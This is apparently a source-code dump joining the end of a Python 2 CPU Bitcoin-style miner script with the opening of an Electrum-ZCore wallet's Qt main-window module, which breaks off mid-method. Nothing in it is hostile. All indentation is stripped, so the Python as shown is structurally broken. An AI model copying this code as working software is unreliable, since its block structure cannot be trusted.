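#   bufreverse('\x01\x02\x03\x04') == '\x04\x03\x02\x01'
#   wordreverse('AAAABBBB') == 'BBBBAAAA'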
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = CornellieisRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mona
from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mona.plugin import run_hook
from electrum_mona.i18n import _
from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED
from electrum_mona.transaction import Transaction, TxOutput
from electrum_mona.address_synchronizer import AddTransactionException
from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mona.version import ELECTRUM_VERSION
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.exchange_rate import FxThread
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.logging import Logger
from electrum_mona.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum_mona.util import pr_expiration_values
from electrum_mona.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
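# Usage sketch (icon file and callback invented): a flat status-bar button
# that fires its callback on click or Return.
#
#   sb = StatusBarButton(read_QIcon("status.png"), _("Status"),
#                        self.show_status_dialog)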
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.masternode_manager = None
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.masternode_tab = self.create_masternode_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
#self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
tabs.addTab(self.masternode_tab, read_QIcon("tab_history.png"), _('Masternodes'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
#if self.wallet.has_lightning():
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
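# Illustration of the rule above: an inline lambda such as
#     self.network.register_callback(lambda *a: self.need_update.set(), interests)
# creates a closure the window keeps no name for, so it could never be
# passed to unregister_callback() on cleanup, and the network's callback
# table would keep the closure (and, through it, `self`) alive forever.
# A bound method like self.on_network can be unregistered symmetrically.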
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
#elif event == 'channels_updated':
# self.channels_list.update_rows.emit(*args)
#elif event == 'channel':
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
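# The OpenAlias lookup runs on a daemon thread so a slow DNS query cannot
# block the GUI or keep the process alive on exit; the result is handed
# back through alias_received_signal, which re-enters the Qt event loop on
# the GUI thread.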
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.masternode_tab.update_nodelist(self.wallet, self.config, self.masternode_manager)
self.wallet.set_sync_masternode_manager(self.masternode_manager)
self.need_update.set()
# Once the GUI has been initialized, check whether anything needs to be announced, since callbacks may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
#self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-ZCore Testnet" if constants.net.TESTNET else "Electrum-ZCore"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)  # sanity check: the stored value must be a sortable list
except Exception:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# 'Settings' / 'Preferences' are reserved menu item names on macOS; use a different label as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://zcore.cash"))
help_menu.addSeparator()
help_menu.addAction(_("&Support"), lambda: webopen("https://central.zcore.cash/support")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('zcore:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-ZCore",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Electrum-ZCore's icon from oimo at askmona.") + "\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-ZCore - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.empty():
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
